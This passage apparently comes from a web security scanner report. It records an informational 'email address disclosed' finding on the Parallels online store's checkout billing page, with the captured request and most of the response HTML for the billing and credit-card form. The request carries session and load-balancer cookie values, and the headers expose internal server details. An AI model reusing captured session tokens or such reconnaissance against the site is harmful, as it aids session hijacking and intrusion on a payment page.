<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1067174464/?label=g5WWCMyrvQEQwJTv_AM&amp;guid=ON&amp;script=0"/>
</div>
</noscript>




   <!-- Thank You page and Your Order is Being Processed Page -->

   
       
   


<!-- begin retargeting pixel -->



<script src="http://display.digitalriver.com/?aid=244" type="text/javascript" defer="defer"></script>


<!-- end retargeting pixel -->













</body>
</html>
5.2. https://store.parallels.com/store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.parallels.com
Path:   /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage

Issue detail

The following email address was disclosed in the response:

Request

GET /store/para/en_US/DisplayThreePgCheckoutAddressPaymentInfoPage HTTP/1.1
Host: store.parallels.com
Connection: keep-alive
Referer: http://store.parallels.com/store?Action=DisplayPage&Env=BASE&Locale=en_US&SiteID=para&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1299874733.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_vnum=1331410733871%26vn%3D1; ORA_WX_SESSION="10.1.2.144:1028-0#0"; JSESSIONID=943A97EDDD493407ED3F48E4A043CCAD; VISITOR_ID=971D4E8DFAED436758C101F425550FD89CDA569B49779CFD; BIGipServerp-drh-dc1pod6-pool2-active=2416050442.1028.0000; RefURL=http%3A%2F%2Fwww.parallels.com%2Fstore%2Fsmall-business-panel%2Fwindows%2F; aspcms_sid=c268913546380a1096a063587ad8f09a; mbox=check#true#1299874834|session#1299874748891-562918#1299876634; op_browser=safari_534.16; op_browserHigh=safari; op_os=windows; s_cc=true; __utma=1.529009189.1299874733.1299874733.1299874733.1; __utmc=1; __utmb=1.3.10.1299874733; s_gpv_page=Checkout%3A%20Shopping%20Cart; s_invisit=true; s_nr=1299874774917-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=102711070059,0)
Date: Fri, 11 Mar 2011 20:18:43 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb04@dc1app61
Content-Length: 67940




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=meta.html"-->
<link rel="icon" href="/DRHM/Storefront/Site/para/cm/images/favicon.ico" type="image/x-icon" />
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/commonFunctions.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/para/cm/multimedia/Omniture/mbox.js"></script>
<!--!/esi:include -->
<link rel="stylesheet" href="https://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=25017c26&Env=BASE&Locale=en_US&SiteID=para&StyleID=26770400&StyleVersion=58&ceid=170596700&cename=TopHeader&id=ThreePgCheckoutAddressPaymentInfoPage"-->






<!-- REQUEST ID: TIME=1299874723058:NODE=c1a6104:THREAD=5071; ESI Fragment - CREATED: Fri Mar 11 14:18:43 CST 2011 MAX-AGE: 28800+180 -->
<!-- BEGIN TOPHEADER -->
<!-- -->

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>Parallels, Inc. (para) Online Store - Billing</title>
<!-- Accessibility links for Home, Help, and Contents (Sitemap) -->
<link rel="home" href="/store/para/en_US/home" title="Home"/>
<link rel="help" href="/store/para/en_US/help" title="Help"/>
<link rel="contents" href="/store/para/en_US/sitemap" title="Sitemap"/>














<script type="text/javascript">
var q = true; // Page-level global variable

// Temporary popUp function that will be replaced by the overlay-enhanced version when the DOM is fully loaded
function popUp(popURL, popName, popWidth, popHeight) {
self.open(popURL, popName, 'width='+popWidth+',height='+popHeight+',resizable=yes,status=yes,screenX=50,screenY=50,top=50,left=50,scrollbars=yes');
}
</script>






<script type="text/javascript">



if (!window.jQuery) {
document.writeln('<scr'+'ipt type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Library/scripts/jquery/jquery-1.3.2.min.js"></scr'+'ipt>');
}

</script>









<script type="text/javascript">
var pageNameFlag = '';
</script>


<!-- Global OT: ptomodule object and browser-detection/cookie-setting -->
<script type="text/javascript" src="//drh1.img.digitalriver.com/DRHM/Storefront/Library/scripts/OTGlobalCode.js"></script>
<script type="text/javascript">
var ot_Country = 'en_US';
</script>
<!-- Site-level OT, from PageBuilder page: OT_globalTrial -->
<script type="text/javascript" src="//atl.img.digitalriver.com/drso/drso-1.4.min.js"></script>
<script type="text/javascript">
if (typeof(optrial) !== 'object') {
optrial = {};
}
//set the cross-domain cookie for NCT Trial Reg test, and delete the download page session cookie (so the sale wil count toward NCT, not download page tests
if (drso.getSessionVar('op612nctfulfill0285001liid').length > 0){
drso.setCookie('op612nctfulfill0285001liid', drso.getSessionVar('op612nctfulfill0285001liid'), drso.getDomain(), null);
drso.deleteCookie('op612downloadparallelsdesktop5formaceliid');
}
</script>
<!-- End of OT_globalTrial -->

<!-- Page-level OT, from OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->
<!--
Counter: para ThreePgCheckoutAddressPaymentInfoPage
Referenced context:
- Cookies: op612threepgcheckoutshoppingcartpageliid
Modified: The counter was last modified 2010-07-01 15:24 GMT.
Note: This script should be included in a secure (https) page.
-->

<script language="javascript" type="text/javascript">
<!--
var _o=(typeof opcounter=="object")?opcounter:new Object;_o.D=document;_o.L=_o.D.location;_o.T=
new Date;_o.Q=new Object;_o.C=new Object;_o.U="https://ssl.pto.digitalriver.com/by/counter/612/-/13/event.js";
_o.D_ts=Math.round(_o.T.getTime()/1000);_o.D_tzo=_o.T.getTimezoneOffset();_o.D_loc=_o.L.protocol+
"//"+_o.L.hostname+_o.L.pathname;_o.D_ckl=_o.D.cookie.length;_o.D_ref=_o.D.referrer;function
_oI(){var s=_o.L.search;var c=_o.D.cookie;if(s.length>3){for(var a=s.substring(1).split("&")
,i=0,l=a.length;i<l;i++){var p=a[i].indexOf("=");if(p>0)_o.Q[a[i].substring(0,p)]=unescape(a[i].substring(
p+1));}}if(c.length>3){for(var a=c.split(";"),i=0,b=a.length;i<b;i++){var v=a[i].split("=");
while(v[0].substring(0,1)==" ")v[0]=v[0].substring(1,v[0].length);if(v.length==2)_o.C[v[0]]=
unescape(v[1]);}}}function _oS(){var o=new Object;for(var n in _o)o[n]=_o[n];o.D=o.L=o.T=o.Q=o.C=
o.U=null;var q='';for(var n in o)if(o[n]!=null && o[n]!="")q+=(q.length>0?"&":(_o.U.indexOf(
"?")>0?"&":"?"))+n+"="+escape(o[n]);return _o.U+q;}_oI();for(var n in _o.Q)if(n.substring(
0,2)=="op")_o[n]=_o.Q[n];for(var n in _o.C)if(n.substring(0,2)=="op")_o[n]=_o.C[n];_o.D.write(
'<'+'script type="text/javascript" src="'+_oS()+'"><\/script>');
//-->
</script>

<!-- End of OT_ThreePgCheckoutAddressPaymentInfoPage_contentBody -->


</head>
<body>


<span class="opDefault" id="opmodule_para_bodyTop"></span>
<script type="text/javascript">
ptomodule.displayModule('para_bodyTop');
</script>



<!-- END TOPHEADER -->

<!--!/esi:include --><!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section0.html"-->
<!--[if IE]
<style type="text/css">
#dr_productUpSell form div#dr_siteButtons {
margin-top:130px;
}
table#us_buttons {
margin:0px 0px 0px 225px;    
}    
</style>
-->

<table border="0" cellpadding="0" cellspacing="0" width="805" align="center">

<tr>
<td class="logo" width="667px"><h1><a href="//www.parallels.com/" title="Parallels"></a></h1></td>
<td id="secureInfo" width="138px"><!--SECURE-LOGO-->

<!--!/esi:include -->






<!-- REQUEST ID: TIME=1299874723385:NODE=c1a6104:THREAD=5071 -->








<div id="dr_geoTrustIcon">
<!-- GeoTrust[tm] Smart Icon tag. Do not edit. -->
<script language="javascript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
<!-- end GeoTrust Smart Icon tag -->
</div>

<!--!esi:include src="/esi?SiteID=para&StyleID=26770400&StyleVersion=58&styleIncludeFile=body-section1.html"-->
       
<!--/SECURE-LOGO-->
</td>

</tr>
<tr>
<td class="breadCrumbsRed" colspan="2"><img src="/DRHM/Storefront/Site/para/cm/images/bc_step1_cart1_on.jpg" alt="Step 1 Cart" width="200" height="22" id="stepOne" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step2_billing_off.jpg" alt="Step 2 Billing" width="200" height="22" id="stepTwo" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step3_verify_off.jpg" alt="Step 3 Verify" width="200" height="22" id="stepThree" /><img src="/DRHM/Storefront/Site/para/cm/images/bc_step4_complete_off.jpg" alt="Step 4 Complete" width="200" height="22" id="stepFour" /></td>
</tr>
</table>
<table border="0" cellpadding="0" cellspacing="0" class="main" align="center">
<tr>
<td><div id="content">
<!--!/esi:include -->




<span class="opDefaultContent" id="opmodule_para_ThreePgCheckoutAddressPaymentInfoPage_contentBody">







<style type="text/css">
.dr_ExpandPaymentDetailsSection {
font: 9px verdana, arial, sans-serif;
color: #999999;
background-color: #ffffff;
margin: 10px 25px 5px 40px;
padding: 3px 5px;
}
</style>















<!-- Splash Transformer Optimized -->










<!--..Layout: ThreePgCheckoutAddressPaymentInfoPage, Generated: Tue Mar 08 16:00:50 CST 2011..-->
<div xmlns="http://www.w3.org/1999/xhtml">
<div xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" id="dr_ThreePgCheckoutAddressPaymentInfo" class="dr_Content">
<div id="dr_CheckoutPayment">
<h1>Checkout</h1>
<div id="dr_CheckoutBreadcrumb">
<ul id="dr_breadcrumbTitles">
<li id="dr_bcCheckoutBilling" class="dr_titleOn">Billing</li>
<li id="dr_bcConfirmOrder" class="dr_titleOff">Verify Order</li>
<li id="dr_bcThankYou" class="dr_titleOff">Order Completed</li>
</ul>
</div>
<form method="post" action="/store/" name="CheckoutAddressForm">
<input name="Action" type="hidden" value="PostThreePgCheckoutAddressPaymentInfoPage"/>
<input name="SiteID" type="hidden" value="para"/>
<input name="Locale" type="hidden" value="en_US"/>
<input value="com.digitalriver.template.form.checkout.CheckoutForm" name="Form" type="hidden"/>
<input name="CallingPageID" type="hidden" value="ThreePgCheckoutAddressPaymentInfoPage"/>
<input type="hidden" name="CLS_DATA_ANALYTICS" value=""/>
<p>To complete your secure online order, please enter your billing information below. The billing information should be exactly as it appears on your credit card statement.</p>
<p class="dr_requiredFieldsInfo">*Fields marked with an asterisk (*) are required.</p>
<input type="hidden" name="ORIG_VALUE_BILLINGverazipInvalidAddress" value=""/>
<input name="BILLINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_SHIPPINGverazipInvalidAddress" value=""/>
<input name="SHIPPINGverazipInvalidAddress" value="" escape="no" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_operation" value="update"/>
<input name="operation" value="update" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_mode" value="anonymous"/>
<input name="mode" value="anonymous" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_enforceValidShippingOption" value="false"/>
<input name="enforceValidShippingOption" value="false" type="hidden"/>
<div id="dr_billingContainer">
<fieldset id="dr_billing">
<legend>Billing Information</legend>
<h3>Billing Information</h3>
<div class="dr_formLine">
<label class="dr_label" for="billingName1">
<span class="dr_required">First Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname1" value=""/>
<input name="BILLINGname1" value="" id="billingName1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingName2">
<span class="dr_required">Last Name:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingName2">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGname2" value=""/>
<input name="BILLINGname2" value="" id="billingName2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCompanyName">Company Name:
<br/>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcompanyName" value=""/>
<input name="BILLINGcompanyName" value="" id="billingCompanyName" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress1">
<span class="dr_required">Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingAddress1">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline1" value=""/>
<input name="BILLINGline1" value="" id="billingAddress1" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingAddress2">Apartment/Suite:</label>
<input type="hidden" name="ORIG_VALUE_BILLINGline2" value=""/>
<input name="BILLINGline2" value="" id="billingAddress2" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCity">
<span class="dr_required">City:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCity">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcity" value=""/>
<input name="BILLINGcity" value="" id="billingCity" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingState">
<span class="dr_required">State/Province:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" validate="billingState" checkCountry="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGstate" value=""/>
<select name="BILLINGstate" id="billingState">
<option value="" selected="selected">Select One</option>
<option value="" selected="selected">*Not Applicable</option>
<option value="AL">Alabama</option>
<option value="AK">Alaska</option>
<option value="AB">Alberta</option>
<option value="AS">American Samoa</option>
<option value="AZ">Arizona</option>
<option value="AR">Arkansas</option>
<option value="AA">Armed Forces America</option>
<option value="AE">Armed Forces Europe</option>
<option value="AP">Armed Forces Pacific</option>
<option value="BC">British Columbia</option>
<option value="CA">California</option>
<option value="CO">Colorado</option>
<option value="CT">Connecticut</option>
<option value="DE">Delaware</option>
<option value="DC">District Of Columbia</option>
<option value="FM">Federated States of Micronesia</option>
<option value="FL">Florida</option>
<option value="GA">Georgia</option>
<option value="GU">Guam</option>
<option value="HI">Hawaii</option>
<option value="ID">Idaho</option>
<option value="IL">Illinois</option>
<option value="IN">Indiana</option>
<option value="IA">Iowa</option>
<option value="KS">Kansas</option>
<option value="KY">Kentucky</option>
<option value="LA">Louisiana</option>
<option value="ME">Maine</option>
<option value="MB">Manitoba</option>
<option value="MH">Marshall Islands</option>
<option value="MD">Maryland</option>
<option value="MA">Massachusetts</option>
<option value="MI">Michigan</option>
<option value="MN">Minnesota</option>
<option value="MS">Mississippi</option>
<option value="MO">Missouri</option>
<option value="MT">Montana</option>
<option value="NE">Nebraska</option>
<option value="NV">Nevada</option>
<option value="NB">New Brunswick</option>
<option value="NL">Newfoundland and Labrador</option>
<option value="NH">New Hampshire</option>
<option value="NJ">New Jersey</option>
<option value="NM">New Mexico</option>
<option value="NY">New York</option>
<option value="NC">North Carolina</option>
<option value="ND">North Dakota</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NT">Northwest Territories</option>
<option value="NS">Nova Scotia</option>
<option value="NU">Nunavut</option>
<option value="OH">Ohio</option>
<option value="OK">Oklahoma</option>
<option value="ON">Ontario</option>
<option value="OR">Oregon</option>
<option value="PW">Palau</option>
<option value="PA">Pennsylvania</option>
<option value="PE">Prince Edward Island</option>
<option value="PR">Puerto Rico</option>
<option value="QC">Quebec</option>
<option value="RI">Rhode Island</option>
<option value="SK">Saskatchewan</option>
<option value="SC">South Carolina</option>
<option value="SD">South Dakota</option>
<option value="TN">Tennessee</option>
<option value="TX">Texas</option>
<option value="UT">Utah</option>
<option value="VT">Vermont</option>
<option value="VA">Virginia</option>
<option value="VI">Virgin Islands</option>
<option value="WA">Washington</option>
<option value="WV">West Virginia</option>
<option value="WI">Wisconsin</option>
<option value="WY">Wyoming</option>
<option value="YT">Yukon</option>
</select>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingPostalCode">
<span class="dr_required">Zip/Postal Code:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPostalCode">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGpostalCode" value=""/>
<input name="BILLINGpostalCode" value="" id="billingPostalCode" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingCountry">
<span class="dr_required">Country:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingCountry">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGcountry" value=""/>
<select name="BILLINGcountry" id="billingCountry">
<option value="" selected="selected">Select One</option>
<option value="AF">Afghanistan</option>
<option value="AL">Albania</option>
<option value="DZ">Algeria</option>
<option value="AS">American Samoa</option>
<option value="AD">Andorra</option>
<option value="AI">Anguilla</option>
<option value="AQ">Antarctica</option>
<option value="AG">Antigua and Barbuda</option>
<option value="AR">Argentina</option>
<option value="AM">Armenia</option>
<option value="AW">Aruba</option>
<option value="AU">Australia</option>
<option value="AT">Austria</option>
<option value="AZ">Azerbaidjan</option>
<option value="BS">Bahamas</option>
<option value="BH">Bahrain</option>
<option value="BD">Bangladesh</option>
<option value="BB">Barbados</option>
<option value="BY">Belarus</option>
<option value="BE">Belgium</option>
<option value="BZ">Belize</option>
<option value="BJ">Benin</option>
<option value="BM">Bermuda</option>
<option value="BT">Bhutan</option>
<option value="BO">Bolivia</option>
<option value="BA">Bosnia-Herzegovina</option>
<option value="BW">Botswana</option>
<option value="BV">Bouvet Island</option>
<option value="BR">Brazil</option>
<option value="IO">British Indian Ocean Territory</option>
<option value="BN">Brunei Darussalam</option>
<option value="BG">Bulgaria</option>
<option value="BF">Burkina Faso</option>
<option value="BI">Burundi</option>
<option value="KH">Cambodia</option>
<option value="CM">Cameroon</option>
<option value="CA">Canada</option>
<option value="CV">Cape Verde</option>
<option value="KY">Cayman Islands</option>
<option value="CF">Central African Republic</option>
<option value="TD">Chad</option>
<option value="CL">Chile</option>
<option value="CN">China</option>
<option value="CX">Christmas Island</option>
<option value="CC">Cocos (Keeling) Islands</option>
<option value="CO">Colombia</option>
<option value="KM">Comoros</option>
<option value="CG">Congo</option>
<option value="CD">Congo, The Democratic Republic Of The</option>
<option value="CK">Cook Islands</option>
<option value="CR">Costa Rica</option>
<option value="HR">Croatia</option>
<option value="CY">Cyprus</option>
<option value="CZ">Czech Republic</option>
<option value="DK">Denmark</option>
<option value="DJ">Djibouti</option>
<option value="DM">Dominica</option>
<option value="DO">Dominican Republic</option>
<option value="TL">EAST TIMOR</option>
<option value="EC">Ecuador</option>
<option value="EG">Egypt</option>
<option value="SV">El Salvador</option>
<option value="GQ">Equatorial Guinea</option>
<option value="ER">Eritrea</option>
<option value="EE">Estonia</option>
<option value="ET">Ethiopia</option>
<option value="FK">Falkland Islands</option>
<option value="FO">Faroe Islands</option>
<option value="FJ">Fiji</option>
<option value="FI">Finland</option>
<option value="FR">France</option>
<option value="GF">French Guiana</option>
<option value="TF">French Southern Territories</option>
<option value="GA">Gabon</option>
<option value="GM">Gambia</option>
<option value="GE">Georgia</option>
<option value="DE">Germany</option>
<option value="GH">Ghana</option>
<option value="GI">Gibraltar</option>
<option value="GB">Great Britain</option>
<option value="GR">Greece</option>
<option value="GL">Greenland</option>
<option value="GD">Grenada</option>
<option value="GP">Guadeloupe (French)</option>
<option value="GU">Guam (USA)</option>
<option value="GT">Guatemala</option>
<option value="GN">Guinea</option>
<option value="GW">Guinea Bissau</option>
<option value="GY">Guyana</option>
<option value="HT">Haiti</option>
<option value="HM">Heard and McDonald Islands</option>
<option value="HN">Honduras</option>
<option value="HK">Hong Kong</option>
<option value="HU">Hungary</option>
<option value="IS">Iceland</option>
<option value="IN">India</option>
<option value="ID">Indonesia</option>
<option value="IE">Ireland</option>
<option value="IL">Israel</option>
<option value="IT">Italy</option>
<option value="CI">Ivory Coast (Cote D'Ivoire)</option>
<option value="JM">Jamaica</option>
<option value="JP">Japan</option>
<option value="JO">Jordan</option>
<option value="KZ">Kazakhstan</option>
<option value="KE">Kenya</option>
<option value="KI">Kiribati</option>
<option value="KW">Kuwait</option>
<option value="KG">Kyrgyzstan</option>
<option value="LA">Laos</option>
<option value="LV">Latvia</option>
<option value="LB">Lebanon</option>
<option value="LS">Lesotho</option>
<option value="LR">Liberia</option>
<option value="LI">Liechtenstein</option>
<option value="LT">Lithuania</option>
<option value="LU">Luxembourg</option>
<option value="MO">Macau</option>
<option value="MK">Macedonia</option>
<option value="MG">Madagascar</option>
<option value="MW">Malawi</option>
<option value="MY">Malaysia</option>
<option value="MV">Maldives</option>
<option value="ML">Mali</option>
<option value="MT">Malta</option>
<option value="MH">Marshall Islands</option>
<option value="MQ">Martinique</option>
<option value="MR">Mauritania</option>
<option value="MU">Mauritius</option>
<option value="YT">Mayotte</option>
<option value="MX">Mexico</option>
<option value="FM">Micronesia, Federated States of</option>
<option value="MD">Moldavia, Republic of</option>
<option value="MC">Monaco</option>
<option value="MN">Mongolia</option>
<option value="MS">Montserrat</option>
<option value="MA">Morocco</option>
<option value="MZ">Mozambique</option>
<option value="MM">Myanmar</option>
<option value="NA">Namibia</option>
<option value="NR">Nauru</option>
<option value="NP">Nepal</option>
<option value="NL">Netherlands</option>
<option value="AN">Netherlands Antilles</option>
<option value="NC">New Caledonia (French)</option>
<option value="NZ">New Zealand</option>
<option value="NI">Nicaragua</option>
<option value="NE">Niger</option>
<option value="NG">Nigeria</option>
<option value="NU">Niue</option>
<option value="NF">Norfolk Island</option>
<option value="MP">Northern Mariana Islands</option>
<option value="NO">Norway</option>
<option value="OM">Oman</option>
<option value="PK">Pakistan</option>
<option value="PW">Palau</option>
<option value="PA">Panama</option>
<option value="PG">Papua New Guinea</option>
<option value="PY">Paraguay</option>
<option value="PE">Peru</option>
<option value="PH">Philippines</option>
<option value="PN">Pitcairn Island</option>
<option value="PL">Poland</option>
<option value="PF">Polynesia (French)</option>
<option value="PT">Portugal</option>
<option value="PR">Puerto Rico</option>
<option value="QA">Qatar</option>
<option value="RE">Reunion (French)</option>
<option value="RO">Romania</option>
<option value="RU">Russian Federation</option>
<option value="GS">S. Georgia and S. Sandwich Isls.</option>
<option value="SH">Saint Helena</option>
<option value="KN">Saint Kitts and Nevis Anguilla</option>
<option value="LC">Saint Lucia</option>
<option value="PM">Saint Pierre and Miquelon</option>
<option value="ST">Saint Tome and Principe</option>
<option value="VC">Saint Vincent and Grenadines</option>
<option value="WS">Samoa</option>
<option value="SM">San Marino</option>
<option value="SA">Saudi Arabia</option>
<option value="SN">Senegal</option>
<option value="SC">Seychelles</option>
<option value="SL">Sierra Leone</option>
<option value="SG">Singapore</option>
<option value="SK">Slovak Republic</option>
<option value="SI">Slovenia</option>
<option value="SB">Solomon Islands</option>
<option value="ZA">South Africa</option>
<option value="KR">South Korea</option>
<option value="ES">Spain</option>
<option value="LK">Sri Lanka</option>
<option value="SR">Suriname</option>
<option value="SJ">Svalbard and Jan Mayen Islands</option>
<option value="SZ">Swaziland</option>
<option value="SE">Sweden</option>
<option value="CH">Switzerland</option>
<option value="TW">Taiwan</option>
<option value="TJ">Tajikistan</option>
<option value="TZ">Tanzania</option>
<option value="TH">Thailand</option>
<option value="TG">Togo</option>
<option value="TK">Tokelau</option>
<option value="TO">Tonga</option>
<option value="TT">Trinidad and Tobago</option>
<option value="TN">Tunisia</option>
<option value="TR">Turkey</option>
<option value="TM">Turkmenistan</option>
<option value="TC">Turks and Caicos Islands</option>
<option value="TV">Tuvalu</option>
<option value="UG">Uganda</option>
<option value="UA">Ukraine</option>
<option value="AE">United Arab Emirates</option>
<option value="US">United States</option>
<option value="UM">United States Minor Outlying Islands</option>
<option value="UY">Uruguay</option>
<option value="UZ">Uzbekistan</option>
<option value="VU">Vanuatu</option>
<option value="VA">Vatican City State</option>
<option value="VE">Venezuela</option>
<option value="VN">Vietnam</option>
<option value="VG">Virgin Islands (British)</option>
<option value="VI">Virgin Islands (USA)</option>
<option value="WF">Wallis and Futuna Islands</option>
<option value="EH">Western Sahara</option>
<option value="YE">Yemen</option>
<option value="ZM">Zambia</option>
</select>
</div>
<div class="dr_formLine">
<label class="dr_label" for="billingPhoneNumber">
<span class="dr_required">Phone Number:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" required="billingPhoneNumber">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_BILLINGphoneNumber" value=""/>
<input name="BILLINGphoneNumber" value="" id="billingPhoneNumber" type="text"/>
</div>
<div class="dr_formLine">
<label class="dr_label" for="email">
<span class="dr_required">Email Address:</span>
<span class="dr_reqFieldIndicator cart-redasterisk">*</span>
<span class="dr_error" requiredEmail="email">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_EMAILemail" value=""/>
<input name="EMAILemail" value="" id="email" type="text"/>
</div>
</fieldset>
</div>
<div id="dr_optInContainer">
<fieldset id="dr_optIn">
<legend>Additional Information</legend>
<h3>Additional Information</h3>
<div id="dr_optInEmail">
<div class="dr_formLine">
<label class="dr_label" for="optIn">We'd like to keep you informed via email about product updates, upgrades, special offers and pricing. If you do not wish to be contacted via email, please ensure that the box is not checked.</label><input type="hidden" name="ORIG_VALUE_optIn" value="on"/><input type="checkbox" name="optIn" value="on" checked="checked"/></div>
</div>
</fieldset>
</div>
<div id="dr_paymentContainer">
<fieldset id="dr_payment">
<legend>Payment Information</legend>
<h3>Payment Information</h3>
<span class="dr_error">
<!--..-->
</span>
<div class="dr_paymentMethodBlock" id="dr_creditCard">
<input type="hidden" name="ORIG_VALUE_paymentMethodID$$1001" value="-1"/>
<input name="paymentMethodID$$1001" value="-1" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_name$$1001" value="CreditCardMethod"/>
<input name="name$$1001" value="CreditCardMethod" type="hidden"/>
<input type="hidden" name="ORIG_VALUE_paymentMethodFee$$1001" value=""/>
<input name="paymentMethodFee$$1001" value="" type="hidden"/>
<div class="dr_formLine" id="dr_creditCardRadioSelect">
<label class="dr_label_paymentMethodName" for="CreditCardMethod">
<input type="hidden" name="ORIG_VALUE_paymentMethodID" value="-1"/>
<input type="radio" name="paymentMethodID" value="-1" id="CreditCardMethod" checked="checked"/>
<strong class="dr_paymentOptionItem">Credit Card</strong>
</label>
<span class="dr_expandDetails">(<a href="#" class="dr_expandDetails" data-expand-section="dr_ExpandPaymentDetailsCreditCardMethod">details</a>)</span>
<p>
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/para/paraSI/version/45/images/cc_mc_en_US.gif" alt="We Accept all Major Credit Cards"/>
</p>
</div>
<div class="dr_ExpandPaymentDetailsSection" id="dr_ExpandPaymentDetailsCreditCardMethod">
<p>Please enter your credit card as a continuous string of numbers without spaces or dashes.<br />The security of your credit card information is important to us. We use Secure Socket Layer (SSL) technology to protect the security of your credit card information.</p>
</div>
<div id="dr_creditCardSection">
<p>
<span class="dr_error">
<!--..-->
</span>
</p>
<div class="dr_formLine" id="dr_ccNumEntry">
<label class="dr_label" for="ccNum">Credit Card Number:
<span class="dr_error" validate="ccNum" checkCcNum="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardNumber" value=""/>
<input name="cardNumber" value="" id="ccNum" type="text"/>
</div>
<div class="dr_formLine" id="dr_expDateSelect">
<label class="dr_label" for="expDate">Expiration Date:
<span class="dr_error" validate="ccMonth" expYear="ccYear" checkExpDate="CreditCardMethod">
<!--..-->
</span>
<span class="dr_error" validate="ccYear" expMonth="ccMonth" checkExpDate="CreditCardMethod">
<!--..-->
</span>
</label>
<input type="hidden" name="ORIG_VALUE_cardExpirationMonth" value=""/>
<select name="cardExpirationMonth" id="ccMonth">
<option value="" selected="selected">Select One</option>
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select> ../<input type="hidden" name="ORIG_VALUE_cardExpirationYear" value=""/>
<select name="cardExpirationYear" id="ccYear">
<option value="" selected="selected">Select One</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
<option value="2017">2017</option>
<option value="2018">2018</option>
<option value="2019">2019</option>
<option value="2020">2020</option>
